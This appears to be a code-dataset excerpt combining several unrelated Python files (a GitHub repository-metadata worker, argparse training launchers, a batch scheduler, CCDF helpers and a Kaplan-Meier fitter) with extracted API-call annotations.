"pve_exporter.http.start_http_server",
"argparse.ArgumentParser"
]
| [((236, 252), 'argparse.ArgumentParser', 'ArgumentParser', ([], {}), '()\n', (250, 252), False, 'from argparse import ArgumentParser\n'), ((741, 802), 'pve_exporter.http.start_http_server', 'start_http_server', (['params.config', 'params.port', 'params.address'], {}), '(params.config, params.port, params.address)\n', (758, 802), False, 'from pve_exporter.http import start_http_server\n')] |
#SPDX-License-Identifier: MIT
import logging, os, sys, time, requests, json
from datetime import datetime
from multiprocessing import Process, Queue
import pandas as pd
import sqlalchemy as s
from workers.worker_base import Worker
# NOTE: This worker primarily inserts rows into the REPO_INFO table, which serves the primary purposes of
# 1. Displaying discrete metadata like "number of forks" and how they change over time
# 2. Validating other workers, like those related to pull requests, issues, and commits. Our totals should be at or very near the totals in the repo_info table.
# This table also updates the REPO table in 2 cases:
# 1. Recognizing when a repository is a forked repository by updating the "forked_from" field and
# 2. Recognizing when a repository is archived, and recording the data we observed the change in status.
class RepoInfoWorker(Worker):
def __init__(self, config={}):
worker_type = "repo_info_worker"
# Define what this worker can be given and know how to interpret
given = [['github_url']]
models = ['repo_info']
# Define the tables needed to insert, update, or delete on
data_tables = ['repo_info', 'repo']
operations_tables = ['worker_history', 'worker_job']
# Run the general worker initialization
super().__init__(worker_type, config, given, models, data_tables, operations_tables)
# Define data collection info
self.tool_source = 'Repo Info Worker'
self.tool_version = '1.0.0'
self.data_source = 'GitHub API'
def repo_info_model(self, task, repo_id):
github_url = task['given']['github_url']
self.logger.info("Beginning filling the repo_info model for repo: " + github_url + "\n")
owner, repo = self.get_owner_repo(github_url)
url = 'https://api.github.com/graphql'
query = """
{
repository(owner:"%s", name:"%s"){
updatedAt
hasIssuesEnabled
issues(states:OPEN) {
totalCount
}
hasWikiEnabled
forkCount
defaultBranchRef {
name
}
watchers {
totalCount
}
id
licenseInfo {
name
url
}
stargazers {
totalCount
}
codeOfConduct {
name
url
}
issue_count: issues {
totalCount
}
issues_closed: issues(states:CLOSED) {
totalCount
}
pr_count: pullRequests {
totalCount
}
pr_open: pullRequests(states: OPEN) {
totalCount
}
pr_closed: pullRequests(states: CLOSED) {
totalCount
}
pr_merged: pullRequests(states: MERGED) {
totalCount
}
ref(qualifiedName: "master") {
target {
... on Commit {
history(first: 0){
totalCount
}
}
}
}
}
}
""" % (owner, repo)
# Hit the graphql endpoint and retry 3 times in case of failure
num_attempts = 0
success = False
data = None
while num_attempts < 3:
self.logger.info("Hitting endpoint: {} ...\n".format(url))
r = requests.post(url, json={'query': query}, headers=self.headers)
self.update_gh_rate_limit(r)
try:
data = r.json()
except:
data = json.loads(json.dumps(r.text))
if 'errors' in data:
self.logger.info("Error!: {}".format(data['errors']))
if data['errors'][0]['message'] == 'API rate limit exceeded':
self.update_gh_rate_limit(r)
continue
if 'data' in data:
success = True
data = data['data']['repository']
break
else:
self.logger.info("Request returned a non-data dict: {}\n".format(data))
if data['message'] == 'Not Found':
self.logger.info("Github repo was not found or does not exist for endpoint: {}\n".format(url))
break
if data['message'] == 'You have triggered an abuse detection mechanism. Please wait a few minutes before you try again.':
self.update_gh_rate_limit(r, temporarily_disable=True)
continue
if data['message'] == 'Bad credentials':
self.update_gh_rate_limit(r, bad_credentials=True)
continue
num_attempts += 1
if not success:
self.logger.error('Cannot hit endpoint after 3 attempts. \"Completing\" task.\n')
self.register_task_completion(self.task, repo_id, 'repo_info')
return
# Just checking that the data is accessible (would not be if repo no longer exists)
try:
data['updatedAt']
except Exception as e:
self.logger.error('Cannot access repo_info data: {}\nError: {}. \"Completing\" task.'.format(data, e))
self.register_task_completion(self.task, repo_id, 'repo_info')
return
# Get committers count info that requires seperate endpoint
committers_count = self.query_committers_count(owner, repo)
# Put all data together in format of the table
self.logger.info(f'Inserting repo info for repo with id:{repo_id}, owner:{owner}, name:{repo}\n')
rep_inf = {
'repo_id': repo_id,
'last_updated': data['updatedAt'] if 'updatedAt' in data else None,
'issues_enabled': data['hasIssuesEnabled'] if 'hasIssuesEnabled' in data else None,
'open_issues': data['issues']['totalCount'] if data['issues'] else None,
'pull_requests_enabled': None,
'wiki_enabled': data['hasWikiEnabled'] if 'hasWikiEnabled' in data else None,
'pages_enabled': None,
'fork_count': data['forkCount'] if 'forkCount' in data else None,
'default_branch': data['defaultBranchRef']['name'] if data['defaultBranchRef'] else None,
'watchers_count': data['watchers']['totalCount'] if data['watchers'] else None,
'UUID': None,
'license': data['licenseInfo']['name'] if data['licenseInfo'] else None,
'stars_count': data['stargazers']['totalCount'] if data['stargazers'] else None,
'committers_count': committers_count,
'issue_contributors_count': None,
'changelog_file': None,
'contributing_file': None,
'license_file': data['licenseInfo']['url'] if data['licenseInfo'] else None,
'code_of_conduct_file': data['codeOfConduct']['url'] if data['codeOfConduct'] else None,
'security_issue_file': None,
'security_audit_file': None,
'status': None,
'keywords': None,
'commit_count': data['ref']['target']['history']['totalCount'] if data['ref'] else None,
'issues_count': data['issue_count']['totalCount'] if data['issue_count'] else None,
'issues_closed': data['issues_closed']['totalCount'] if data['issues_closed'] else None,
'pull_request_count': data['pr_count']['totalCount'] if data['pr_count'] else None,
'pull_requests_open': data['pr_open']['totalCount'] if data['pr_open'] else None,
'pull_requests_closed': data['pr_closed']['totalCount'] if data['pr_closed'] else None,
'pull_requests_merged': data['pr_merged']['totalCount'] if data['pr_merged'] else None,
'tool_source': self.tool_source,
'tool_version': self.tool_version,
'data_source': self.data_source
}
result = self.db.execute(self.repo_info_table.insert().values(rep_inf))
self.logger.info(f"Primary Key inserted into repo_info table: {result.inserted_primary_key}\n")
self.results_counter += 1
# Note that the addition of information about where a repository may be forked from, and whether a repository is archived, updates the `repo` table, not the `repo_info` table.
forked = self.is_forked(owner, repo)
archived = self.is_archived(owner, repo)
archived_date_collected = None
if archived is not False:
archived_date_collected = archived
archived = 1
else:
archived = 0
rep_additional_data = {
'forked_from': forked,
'repo_archived': archived,
'repo_archived_date_collected': archived_date_collected
}
result = self.db.execute(self.repo_table.update().where(
self.repo_table.c.repo_id==repo_id).values(rep_additional_data))
self.logger.info(f"Inserted info for {owner}/{repo}\n")
# Register this task as completed
self.register_task_completion(self.task, repo_id, "repo_info")
def query_committers_count(self, owner, repo):
self.logger.info('Querying committers count\n')
url = f'https://api.github.com/repos/{owner}/{repo}/contributors?per_page=100'
committers = 0
try:
while True:
r = requests.get(url, headers=self.headers)
self.update_gh_rate_limit(r)
committers += len(r.json())
if 'next' not in r.links:
break
else:
url = r.links['next']['url']
except Exception:
self.logger.exception('An error occured while querying contributor count\n')
return committers
def is_forked(self, owner, repo): #/repos/:owner/:repo parent
self.logger.info('Querying parent info to verify if the repo is forked\n')
url = f'https://api.github.com/repos/{owner}/{repo}'
r = requests.get(url, headers=self.headers)
self.update_gh_rate_limit(r)
data = self.get_repo_data(url, r)
if 'fork' in data:
if 'parent' in data:
return data['parent']['full_name']
return 'Parent not available'
return False
def is_archived(self, owner, repo):
self.logger.info('Querying committers count\n')
url = f'https://api.github.com/repos/{owner}/{repo}'
r = requests.get(url, headers=self.headers)
self.update_gh_rate_limit(r)
data = self.get_repo_data(url, r)
if 'archived' in data:
if data['archived']:
if 'updated_at' in data:
return data['updated_at']
return 'Date not available'
return False
return False
def get_repo_data(self, url, response):
success = False
try:
data = response.json()
except:
data = json.loads(json.dumps(response.text))
if 'errors' in data:
self.logger.info("Error!: {}".format(data['errors']))
if data['errors'][0]['message'] == 'API rate limit exceeded':
self.update_gh_rate_limit(response)
if 'id' in data:
success = True
else:
self.logger.info("Request returned a non-data dict: {}\n".format(data))
if data['message'] == 'Not Found':
self.logger.info("Github repo was not found or does not exist for endpoint: {}\n".format(url))
if data['message'] == 'You have triggered an abuse detection mechanism. Please wait a few minutes before you try again.':
self.update_gh_rate_limit(r, temporarily_disable=True)
if data['message'] == 'Bad credentials':
self.update_gh_rate_limit(r, bad_credentials=True)
if not success:
self.register_task_failure(self.task, repo_id, "Failed to hit endpoint: {}".format(url))
return data
| [
"json.dumps",
"requests.post",
"requests.get"
]
| [((10670, 10709), 'requests.get', 'requests.get', (['url'], {'headers': 'self.headers'}), '(url, headers=self.headers)\n', (10682, 10709), False, 'import logging, os, sys, time, requests, json\n'), ((11137, 11176), 'requests.get', 'requests.get', (['url'], {'headers': 'self.headers'}), '(url, headers=self.headers)\n', (11149, 11176), False, 'import logging, os, sys, time, requests, json\n'), ((4041, 4104), 'requests.post', 'requests.post', (['url'], {'json': "{'query': query}", 'headers': 'self.headers'}), "(url, json={'query': query}, headers=self.headers)\n", (4054, 4104), False, 'import logging, os, sys, time, requests, json\n'), ((10035, 10074), 'requests.get', 'requests.get', (['url'], {'headers': 'self.headers'}), '(url, headers=self.headers)\n', (10047, 10074), False, 'import logging, os, sys, time, requests, json\n'), ((11663, 11688), 'json.dumps', 'json.dumps', (['response.text'], {}), '(response.text)\n', (11673, 11688), False, 'import logging, os, sys, time, requests, json\n'), ((4250, 4268), 'json.dumps', 'json.dumps', (['r.text'], {}), '(r.text)\n', (4260, 4268), False, 'import logging, os, sys, time, requests, json\n')] |
# coding: utf-8
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from __future__ import unicode_literals
import argparse
def parse_args_tolerance():
parser = argparse.ArgumentParser(description='just for tolerance')
parser.add_argument("--tolerance", type=float,
default=0.1, help="tolerance value for Minuit migrad and simplex minimization")
args, _ = parser.parse_known_args()
return args.tolerance
def GB_parse_args(main_description="Training launcher"):
parser = argparse.ArgumentParser(description=main_description)
parser.add_argument("--verbose", "-v", type=int, choices=[0, 1, 2],
default=0, help="increase output verbosity")
parser.add_argument("--start-cv", type=int,
default=0, help="start of i_cv for range(start, end)")
parser.add_argument("--end-cv", type=int,
default=30, help="end of i_cv for range(start, end)")
parser.add_argument("--tolerance", type=float,
default=0.1, help="tolerance value for Minuit migrad and simplex minimization")
parser.add_argument('--load-run', help='load saved runs. Do not run the models',
action='store_true')
parser.add_argument('--estimate-only', help='Turns off conditional estimation for V_stat and V_syst',
action='store_true')
parser.add_argument('--conditional-only', help='Turns off common estimation',
action='store_true')
# MODEL HYPER PARAMETERS
parser.add_argument('--n-estimators', help='number of estimators',
default=100, type=int)
parser.add_argument('--max-depth', help='maximum depth of trees',
default=3, type=int)
parser.add_argument('--learning-rate', '--lr', help='learning rate',
default=1e-1, type=float)
# OTHER
parser.add_argument('--no-cuda', '--no-gpu', help='flag to use or not the gpu',
action='store_false', dest='cuda')
parser.add_argument('--retrain', help='flag to force retraining',
action='store_true')
parser.add_argument('--skip-minuit', help='flag to skip minuit NLL minization',
action='store_true')
args = parser.parse_args()
return args
def REG_parse_args(main_description="Training launcher"):
parser = argparse.ArgumentParser(description=main_description)
parser.add_argument("--verbose", "-v", type=int, choices=[0, 1, 2],
default=0, help="increase output verbosity")
parser.add_argument("--start-cv", type=int,
default=0, help="start of i_cv for range(start, end)")
parser.add_argument("--end-cv", type=int,
default=30, help="end of i_cv for range(start, end)")
parser.add_argument("--tolerance", type=float,
default=0.1, help="tolerance value for Minuit migrad and simplex minimization")
parser.add_argument('--load-run', help='load saved runs. Do not run the models',
action='store_true')
parser.add_argument('--estimate-only', help='Turns off conditional estimation for V_stat and V_syst',
action='store_true')
parser.add_argument('--conditional-only', help='Turns off common estimation',
action='store_true')
# MODEL HYPER PARAMETERS
parser.add_argument('--learning-rate', '--lr', help='learning rate',
default=1e-4, type=float)
parser.add_argument('--beta1', help='beta 1 for Adam',
default=0.5, type=float)
parser.add_argument('--beta2', help='beta 2 for Adam',
default=0.9, type=float)
parser.add_argument('--weight-decay', help='weight decay for SGD',
default=0.0, type=float)
parser.add_argument('--optimizer', help='optimizer name', dest='optimizer_name',
default='Adam', type=str, choices=('Adam', 'SGD', 'ADAM', 'sgd', 'adam'))
parser.add_argument('--n-unit', help='Number of units in layers. Controls NN width.',
default=200, type=int)
parser.add_argument('--sample-size', help='data sample size',
default=1000, type=int)
parser.add_argument('--batch-size', help='mini-batch size',
default=20, type=int)
parser.add_argument('--n-steps', help='number of update steps',
default=1000, type=int)
# OTHER
parser.add_argument('--no-cuda', '--no-gpu', help='flag to use or not the gpu',
action='store_false', dest='cuda')
parser.add_argument('--retrain', help='flag to force retraining',
action='store_true')
args = parser.parse_args()
return args
def INFERNO_parse_args(main_description="Training launcher"):
parser = argparse.ArgumentParser(description=main_description)
parser.add_argument("--verbose", "-v", type=int, choices=[0, 1, 2],
default=0, help="increase output verbosity")
parser.add_argument("--start-cv", type=int,
default=0, help="start of i_cv for range(start, end)")
parser.add_argument("--end-cv", type=int,
default=30, help="end of i_cv for range(start, end)")
parser.add_argument("--tolerance", type=float,
default=0.1, help="tolerance value for Minuit migrad and simplex minimization")
parser.add_argument('--load-run', help='load saved runs. Do not run the models',
action='store_true')
parser.add_argument('--estimate-only', help='Turns off conditional estimation for V_stat and V_syst',
action='store_true')
parser.add_argument('--conditional-only', help='Turns off common estimation',
action='store_true')
# MODEL HYPER PARAMETERS
parser.add_argument('--learning-rate', '--lr', help='learning rate',
default=1e-3, type=float)
parser.add_argument('--temperature', help='control initial softmax steepness',
default=1.0, type=float)
parser.add_argument('--beta1', help='beta 1 for Adam',
default=0.5, type=float)
parser.add_argument('--beta2', help='beta 2 for Adam',
default=0.9, type=float)
parser.add_argument('--weight-decay', help='weight decay for SGD',
default=0.0, type=float)
parser.add_argument('--optimizer', help='optimizer name', dest='optimizer_name',
default='Adam', type=str, choices=('Adam', 'SGD', 'ADAM', 'sgd', 'adam'))
parser.add_argument('--n-unit', help='Number of units in layers. Controls NN width.',
default=200, type=int)
parser.add_argument('--n-bins', help='number of output bins',
default=10, type=int)
parser.add_argument('--sample-size', help='data sample size',
default=1000, type=int)
parser.add_argument('--batch-size', help='mini-batch size',
default=20, type=int)
parser.add_argument('--n-steps', help='number of update steps',
default=1000, type=int)
# OTHER
parser.add_argument('--no-cuda', '--no-gpu', help='flag to use or not the gpu',
action='store_false', dest='cuda')
parser.add_argument('--retrain', help='flag to force retraining',
action='store_true')
args = parser.parse_args()
return args
def NET_parse_args(main_description="Training launcher"):
parser = argparse.ArgumentParser(description=main_description)
parser.add_argument("--verbose", "-v", type=int, choices=[0, 1, 2],
default=0, help="increase output verbosity")
parser.add_argument("--start-cv", type=int,
default=0, help="start of i_cv for range(start, end)")
parser.add_argument("--end-cv", type=int,
default=30, help="end of i_cv for range(start, end)")
parser.add_argument("--tolerance", type=float,
default=0.1, help="tolerance value for Minuit migrad and simplex minimization")
parser.add_argument('--load-run', help='load saved runs. Do not run the models',
action='store_true')
parser.add_argument('--estimate-only', help='Turns off conditional estimation for V_stat and V_syst',
action='store_true')
parser.add_argument('--conditional-only', help='Turns off common estimation',
action='store_true')
# MODEL HYPER PARAMETERS
parser.add_argument('--learning-rate', '--lr', help='learning rate',
default=1e-3, type=float)
parser.add_argument('--beta1', help='beta 1 for Adam',
default=0.9, type=float)
parser.add_argument('--beta2', help='beta 2 for Adam',
default=0.999, type=float)
parser.add_argument('--weight-decay', help='weight decay for SGD',
default=0.0, type=float)
parser.add_argument('--optimizer', help='optimizer name', dest='optimizer_name',
default='Adam', type=str, choices=('Adam', 'SGD', 'ADAM', 'sgd', 'adam'))
parser.add_argument('--n-unit', help='Number of units in layers. Controls NN width.',
default=200, type=int)
parser.add_argument('--sample-size', help='data sample size',
default=1000, type=int)
parser.add_argument('--batch-size', help='mini-batch size',
default=1000, type=int)
parser.add_argument('--n-steps', help='number of update steps',
default=1000, type=int)
# OTHER
parser.add_argument('--no-cuda', '--no-gpu', help='flag to use or not the gpu',
action='store_false', dest='cuda')
parser.add_argument('--retrain', help='flag to force retraining',
action='store_true')
args = parser.parse_args()
return args
def TP_parse_args(main_description="Training launcher"):
parser = argparse.ArgumentParser(description=main_description)
parser.add_argument("--verbose", "-v", type=int, choices=[0, 1, 2],
default=0, help="increase output verbosity")
parser.add_argument("--start-cv", type=int,
default=0, help="start of i_cv for range(start, end)")
parser.add_argument("--end-cv", type=int,
default=30, help="end of i_cv for range(start, end)")
parser.add_argument("--tolerance", type=float,
default=0.1, help="tolerance value for Minuit migrad and simplex minimization")
parser.add_argument('--load-run', help='load saved runs. Do not run the models',
action='store_true')
parser.add_argument('--estimate-only', help='Turns off conditional estimation for V_stat and V_syst',
action='store_true')
parser.add_argument('--conditional-only', help='Turns off common estimation',
action='store_true')
# MODEL HYPER PARAMETERS
parser.add_argument('--learning-rate', '--lr', help='learning rate',
default=1e-3, type=float)
parser.add_argument('--trade-off', help='trade-off between classic loss and adversarial loss',
default=1.0, type=float)
parser.add_argument('--beta1', help='beta 1 for Adam',
default=0.9, type=float)
parser.add_argument('--beta2', help='beta 2 for Adam',
default=0.999, type=float)
parser.add_argument('--weight-decay', help='weight decay for SGD',
default=0.0, type=float)
parser.add_argument('--optimizer', help='optimizer name', dest='optimizer_name',
default='Adam', type=str, choices=('Adam', 'SGD', 'ADAM', 'sgd', 'adam'))
parser.add_argument('--n-unit', help='Number of units in layers. Controls NN width.',
default=200, type=int)
parser.add_argument('--sample-size', help='data sample size',
default=1000, type=int)
parser.add_argument('--batch-size', help='mini-batch size',
default=1000, type=int)
parser.add_argument('--n-steps', help='number of update steps',
default=1000, type=int)
# OTHER
parser.add_argument('--no-cuda', '--no-gpu', help='flag to use or not the gpu',
action='store_false', dest='cuda')
parser.add_argument('--retrain', help='flag to force retraining',
action='store_true')
args = parser.parse_args()
return args
def PIVOT_parse_args(main_description="Training launcher"):
parser = argparse.ArgumentParser(description=main_description)
parser.add_argument("--verbose", "-v", type=int, choices=[0, 1, 2],
default=0, help="increase output verbosity")
parser.add_argument("--start-cv", type=int,
default=0, help="start of i_cv for range(start, end)")
parser.add_argument("--end-cv", type=int,
default=30, help="end of i_cv for range(start, end)")
parser.add_argument("--tolerance", type=float,
default=0.1, help="tolerance value for Minuit migrad and simplex minimization")
parser.add_argument('--load-run', help='load saved runs. Do not run the models',
action='store_true')
parser.add_argument('--estimate-only', help='Turns off conditional estimation for V_stat and V_syst',
action='store_true')
parser.add_argument('--conditional-only', help='Turns off common estimation',
action='store_true')
# MODEL HYPER PARAMETERS
parser.add_argument('--learning-rate', '--lr', help='learning rate',
default=1e-3, type=float)
parser.add_argument('--trade-off', help='trade-off between classic loss and adversarial loss',
default=1.0, type=float)
parser.add_argument('--beta1', help='beta 1 for Adam',
default=0.9, type=float)
parser.add_argument('--beta2', help='beta 2 for Adam',
default=0.999, type=float)
parser.add_argument('--weight-decay', help='weight decay for SGD',
default=0.0, type=float)
parser.add_argument('--optimizer', help='optimizer name', dest='optimizer_name',
default='Adam', type=str, choices=('Adam', 'SGD', 'ADAM', 'sgd', 'adam'))
parser.add_argument('--n-unit', help='Number of units in layers. Controls NN width.',
default=200, type=int)
parser.add_argument('--sample-size', help='data sample size',
default=1000, type=int)
parser.add_argument('--batch-size', help='mini-batch size',
default=1000, type=int)
parser.add_argument('--n-steps', help='number of update steps',
default=1000, type=int)
parser.add_argument('--n-net-pre-training-steps', help='number of update steps for pretraining the classifier',
default=1000, type=int)
parser.add_argument('--n-adv-pre-training-steps', help='number of update steps for pretraining the adversarial',
default=1000, type=int)
parser.add_argument('--n-recovery-steps', help='number of update steps for adversarial recovery',
default=1, type=int)
# OTHER
parser.add_argument('--no-cuda', '--no-gpu', help='flag to use or not the gpu',
action='store_false', dest='cuda')
parser.add_argument('--retrain', help='flag to force retraining',
action='store_true')
args = parser.parse_args()
return args
def FF_parse_args(main_description="Training launcher"):
parser = argparse.ArgumentParser(description=main_description)
parser.add_argument("--verbose", "-v", type=int, choices=[0, 1, 2],
default=0, help="increase output verbosity")
parser.add_argument("--start-cv", type=int,
default=0, help="start of i_cv for range(start, end)")
parser.add_argument("--end-cv", type=int,
default=30, help="end of i_cv for range(start, end)")
parser.add_argument("--tolerance", type=float,
default=0.1, help="tolerance value for Minuit migrad and simplex minimization")
parser.add_argument('--load-run', help='load saved runs. Do not run the models',
action='store_true')
parser.add_argument('--estimate-only', help='Turns off conditional estimation for V_stat and V_syst',
action='store_true')
parser.add_argument('--conditional-only', help='Turns off common estimation',
action='store_true')
# MODEL HYPER PARAMETERS
parser.add_argument('--feature-id', help='feature index to filter on',
default=0, type=int)
# OTHER
parser.add_argument('--no-cuda', '--no-gpu', help='flag to use or not the gpu',
action='store_false', dest='cuda')
parser.add_argument('--retrain', help='flag to force retraining',
action='store_true')
parser.add_argument('--skip-minuit', help='flag to skip minuit NLL minization',
action='store_true')
args = parser.parse_args()
return args
| [
"argparse.ArgumentParser"
]
| [((225, 282), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""just for tolerance"""'}), "(description='just for tolerance')\n", (248, 282), False, 'import argparse\n'), ((575, 628), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': 'main_description'}), '(description=main_description)\n', (598, 628), False, 'import argparse\n'), ((2495, 2548), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': 'main_description'}), '(description=main_description)\n', (2518, 2548), False, 'import argparse\n'), ((5058, 5111), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': 'main_description'}), '(description=main_description)\n', (5081, 5111), False, 'import argparse\n'), ((7862, 7915), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': 'main_description'}), '(description=main_description)\n', (7885, 7915), False, 'import argparse\n'), ((10422, 10475), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': 'main_description'}), '(description=main_description)\n', (10445, 10475), False, 'import argparse\n'), ((13135, 13188), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': 'main_description'}), '(description=main_description)\n', (13158, 13188), False, 'import argparse\n'), ((16320, 16373), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': 'main_description'}), '(description=main_description)\n', (16343, 16373), False, 'import argparse\n')] |
import math
class Schedule():
def __init__(self, total, batch_size):
self._batch_size = batch_size
self._state = ""
self.total = total
self.scheduled = 0
self.finished = 0
@property
def _batch(self):
return math.ceil(self.scheduled / self._batch_size)
@property
def _batches(self):
return math.ceil(self.total / self._batch_size)
@property
def _percentage(self):
_percentage = self.scheduled / self.total * 100
return "%.1f%%" % _percentage
def suffix(self, string):
return " ".join((
string,
"#%d/%d %s" %
(
self._batch,
self._batches,
self._percentage
)
))
def completed(self):
if self.finished != self.total:
raise ValueError(self.finished, self.total)
def __iter__(self):
return self
def __next__(self):
if self.scheduled >= self.total:
self._state = "pending, waiting for completion,"
raise StopIteration()
self.scheduled += self._batch_size
if self.scheduled > self.total:
self.scheduled = self.total
self._state = self.suffix("running, on batch") + ","
return self._batch
def __str__(self):
return " ".join(f"""
<Schedule {"done" if self.finished >= self.total else self._state}
total={self.total} scheduled={self.scheduled} finished={self.finished}>
""".split())
def test_01():
schedule = Schedule(100, 10)
for batch in schedule:
print(batch)
print(schedule)
def test_02():
schedule = Schedule(25, 10)
for batch in schedule:
print(batch)
print(schedule)
print(schedule.suffix("Task"))
def test_03():
schedule = Schedule(0, 10)
for batch in schedule:
print(batch)
print(schedule)
print(schedule.suffix("Task"))
def test_04():
schedule = Schedule(1, 10)
for batch in schedule:
print(batch)
print(schedule)
print(schedule.suffix("Task"))
if __name__ == "__main__":
test_02()
| [
"math.ceil"
]
| [((272, 316), 'math.ceil', 'math.ceil', (['(self.scheduled / self._batch_size)'], {}), '(self.scheduled / self._batch_size)\n', (281, 316), False, 'import math\n'), ((371, 411), 'math.ceil', 'math.ceil', (['(self.total / self._batch_size)'], {}), '(self.total / self._batch_size)\n', (380, 411), False, 'import math\n')] |
# -*- coding: utf-8 -*-
""" Function that implement Complement the Complementary Cumulative
Distribution Function (CCDF).
"""
#
# written by <NAME> <<EMAIL>>
import numpy as np
import pandas as pd
def ccdf(s):
"""
Parameters:
`s`, series, the values of s should be variable to be handled
Return:
a new series `s`, index of s will be X axis (number), value of s
will be Y axis (probability)
"""
s = s.copy()
s = s.sort_values(ascending=True, inplace=False)
s.reset_index(drop=True, inplace=True)
n = len(s)
s.drop_duplicates(keep='first', inplace=True)
X = s.values
Y = [n - i for i in s.index]
return pd.Series(data=Y, index=X) / n
def sum_cdf(s):
s = s.copy()
s = s.value_counts()
s = s.sort_index(ascending=True)
cumulative = []
for i in range(len(s)):
s0 = s.iloc[:i + 1]
cumulative.append(np.inner(s0.index, s0.values))
s = pd.Series(cumulative, index=s.index)
return s / s.max()
def sum_ccdf(s):
"""
Parameters:
`s`, series, the values of s should be variable to be handled
Return:
a news series `s`, index of s will be X axis (number), values
will be Y axis (sum(X>=x))
"""
s = s.copy()
s = s.value_counts()
s = s.sort_index(ascending=True)
cumulative = []
for i in range(len(s)):
s1 = s.iloc[i:]
cumulative.append(np.inner(s1.index, s1.values))
return pd.Series(cumulative, index=s.index)
| [
"pandas.Series",
"numpy.inner"
]
| [((946, 982), 'pandas.Series', 'pd.Series', (['cumulative'], {'index': 's.index'}), '(cumulative, index=s.index)\n', (955, 982), True, 'import pandas as pd\n'), ((1463, 1499), 'pandas.Series', 'pd.Series', (['cumulative'], {'index': 's.index'}), '(cumulative, index=s.index)\n', (1472, 1499), True, 'import pandas as pd\n'), ((677, 703), 'pandas.Series', 'pd.Series', ([], {'data': 'Y', 'index': 'X'}), '(data=Y, index=X)\n', (686, 703), True, 'import pandas as pd\n'), ((907, 936), 'numpy.inner', 'np.inner', (['s0.index', 's0.values'], {}), '(s0.index, s0.values)\n', (915, 936), True, 'import numpy as np\n'), ((1421, 1450), 'numpy.inner', 'np.inner', (['s1.index', 's1.values'], {}), '(s1.index, s1.values)\n', (1429, 1450), True, 'import numpy as np\n')] |
# -*- coding: utf-8 -*-
from __future__ import print_function
import numpy as np
import pandas as pd
from lifelines.fitters import UnivariateFitter
from lifelines.utils import _preprocess_inputs, _additive_estimate, StatError, inv_normal_cdf,\
median_survival_times
from lifelines.plotting import plot_loglogs
class KaplanMeierFitter(UnivariateFitter):
"""
Class for fitting the Kaplan-Meier estimate for the survival function.
KaplanMeierFitter( alpha=0.95)
alpha: The alpha value associated with the confidence intervals.
"""
def fit(self, durations, event_observed=None, timeline=None, entry=None, label='KM_estimate',
alpha=None, left_censorship=False, ci_labels=None):
"""
Parameters:
duration: an array, or pd.Series, of length n -- duration subject was observed for
timeline: return the best estimate at the values in timelines (postively increasing)
event_observed: an array, or pd.Series, of length n -- True if the the death was observed, False if the event
was lost (right-censored). Defaults all True if event_observed==None
entry: an array, or pd.Series, of length n -- relative time when a subject entered the study. This is
useful for left-truncated (not left-censored) observations. If None, all members of the population
were born at time 0.
label: a string to name the column of the estimate.
alpha: the alpha value in the confidence intervals. Overrides the initializing
alpha for this call to fit only.
left_censorship: True if durations and event_observed refer to left censorship events. Default False
ci_labels: add custom column names to the generated confidence intervals
as a length-2 list: [<lower-bound name>, <upper-bound name>]. Default: <label>_lower_<alpha>
Returns:
self, with new properties like 'survival_function_'.
"""
# if the user is interested in left-censorship, we return the cumulative_density_, no survival_function_,
estimate_name = 'survival_function_' if not left_censorship else 'cumulative_density_'
v = _preprocess_inputs(durations, event_observed, timeline, entry)
self.durations, self.event_observed, self.timeline, self.entry, self.event_table = v
self._label = label
alpha = alpha if alpha else self.alpha
log_survival_function, cumulative_sq_ = _additive_estimate(self.event_table, self.timeline,
self._additive_f, self._additive_var,
left_censorship)
if entry is not None:
# a serious problem with KM is that when the sample size is small and there are too few early
# truncation times, it may happen that is the number of patients at risk and the number of deaths is the same.
# we adjust for this using the Breslow-Fleming-Harrington estimator
n = self.event_table.shape[0]
net_population = (self.event_table['entrance'] - self.event_table['removed']).cumsum()
if net_population.iloc[:int(n / 2)].min() == 0:
ix = net_population.iloc[:int(n / 2)].argmin()
raise StatError("""There are too few early truncation times and too many events. S(t)==0 for all t>%.1f. Recommend BreslowFlemingHarringtonFitter.""" % ix)
# estimation
setattr(self, estimate_name, pd.DataFrame(np.exp(log_survival_function), columns=[self._label]))
self.__estimate = getattr(self, estimate_name)
self.confidence_interval_ = self._bounds(cumulative_sq_[:, None], alpha, ci_labels)
self.median_ = median_survival_times(self.__estimate, left_censorship=left_censorship)
# estimation methods
self.predict = self._predict(estimate_name, label)
self.subtract = self._subtract(estimate_name)
self.divide = self._divide(estimate_name)
# plotting functions
self.plot = self._plot_estimate(estimate_name)
setattr(self, "plot_" + estimate_name, self.plot)
self.plot_loglogs = plot_loglogs(self)
return self
def _bounds(self, cumulative_sq_, alpha, ci_labels):
# See http://courses.nus.edu.sg/course/stacar/internet/st3242/handouts/notes2.pdf
alpha2 = inv_normal_cdf((1. + alpha) / 2.)
df = pd.DataFrame(index=self.timeline)
v = np.log(self.__estimate.values)
if ci_labels is None:
ci_labels = ["%s_upper_%.2f" % (self._label, alpha), "%s_lower_%.2f" % (self._label, alpha)]
assert len(ci_labels) == 2, "ci_labels should be a length 2 array."
df[ci_labels[0]] = np.exp(-np.exp(np.log(-v) + alpha2 * np.sqrt(cumulative_sq_) / v))
df[ci_labels[1]] = np.exp(-np.exp(np.log(-v) - alpha2 * np.sqrt(cumulative_sq_) / v))
return df
def _additive_f(self, population, deaths):
np.seterr(invalid='ignore', divide='ignore')
return (np.log(population - deaths) - np.log(population))
def _additive_var(self, population, deaths):
np.seterr(divide='ignore')
return (1. * deaths / (population * (population - deaths))).replace([np.inf], 0)
| [
"lifelines.utils._additive_estimate",
"numpy.sqrt",
"numpy.log",
"lifelines.utils._preprocess_inputs",
"lifelines.utils.StatError",
"numpy.exp",
"lifelines.utils.inv_normal_cdf",
"pandas.DataFrame",
"numpy.seterr",
"lifelines.utils.median_survival_times",
"lifelines.plotting.plot_loglogs"
]
